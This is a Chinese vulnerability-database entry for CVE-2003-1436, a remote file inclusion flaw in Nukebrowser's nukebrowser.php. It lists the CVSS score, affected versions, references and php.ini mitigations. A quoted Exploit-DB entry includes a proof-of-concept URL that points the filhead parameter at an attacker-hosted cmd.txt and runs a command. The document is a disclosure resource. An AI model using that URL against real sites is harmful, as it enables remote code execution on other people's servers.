CVE-2003-1436
CVSS6.8
发布时间 :2003-12-31 00:00:00
修订时间 :2008-09-05 16:36:55
NMCOE    

[原文]PHP remote file inclusion vulnerability in nukebrowser.php in Nukebrowser 2.1 to 2.5 allows remote attackers to execute arbitrary PHP code via the filhead parameter.


[CNNVD]Nukebrowser远程包含漏洞(CNNVD-200312-184)

        
        Nukebrowser是一个用PHP写的CGI程序。
        Nukebrowser的nukebrowser.php脚本文件存在漏洞,远程攻击者可以包含其它服务器上的任意文件执行系统命令。
        远程攻击者可以在其控制的服务器上上传一个恶意PHP指令的文件,然后在URL的参数里引用包含这个恶意脚本文件,就可以在受影响服务器上执行任意命令。
        

- CVSS (基础分值)

CVSS分值: 6.8 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-94 [对生成代码的控制不恰当(代码注入)]

- CPE (受影响的平台与产品)

cpe:/a:crossnuke:nukebrowser:2.41
cpe:/a:crossnuke:nukebrowser:2.20
cpe:/a:crossnuke:nukebrowser:2.3
cpe:/a:crossnuke:nukebrowser:2.11
cpe:/a:crossnuke:nukebrowser:2.1
cpe:/a:crossnuke:nukebrowser:2.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1436
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-1436
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200312-184
(官方数据源) CNNVD

- 其它链接及资源

http://securitytracker.com/id?1006031
(PATCH)  SECTRACK  1006031
http://xforce.iss.net/xforce/xfdb/11217
(UNKNOWN)  XF  nukebrowser-php-file-include(11217)
http://www.securityfocus.com/bid/6731
(UNKNOWN)  BID  6731
http://secunia.com/advisories/7986
(VENDOR_ADVISORY)  SECUNIA  7986

- 漏洞信息

Nukebrowser远程包含漏洞
中危 输入验证
2003-12-31 00:00:00 2003-12-31 00:00:00
远程  
        
        Nukebrowser是一个用PHP写的CGI程序。
        Nukebrowser的nukebrowser.php脚本文件存在漏洞,远程攻击者可以包含其它服务器上的任意文件执行系统命令。
        远程攻击者可以在其控制的服务器上上传一个恶意PHP指令的文件,然后在URL的参数里引用包含这个恶意脚本文件,就可以在受影响服务器上执行任意命令。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 修改php.ini的配置,设置:
        allow_url_fopen = off
        register_globals = off
        然后重启web服务器。
        厂商补丁:
        Nukebrowser
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://lophas.phpwebhosting.com/nukebrowser.php

- 漏洞信息 (22206)

Nukebrowser 2.x Remote File Include Vulnerability (EDBID:22206)
php webapps
2003-01-30 Verified
0 Havenard
N/A [点击下载]
source: http://www.securityfocus.com/bid/6731/info

Nukebrowser is prone to an issue which may allow remote attackers to include files located on remote servers. This issue is present in the nukebrowser.php script file.

Under some circumstances, it is possible for remote attackers to influence the include path for 'cmd.txt' to point to an external file on a remote server by manipulating some URI parameters.

http://[victim]/nukebrowser.php?filnavn=http://www.site.com&filhead=http://[web hosting]/cmd.txt&cmd=id		

- 漏洞信息

40806
Nukebrowser nukebrowser.php filhead Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public Uncoordinated Disclosure

- 漏洞描述

- 时间线

2003-01-27 Unknow
2003-01-30 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站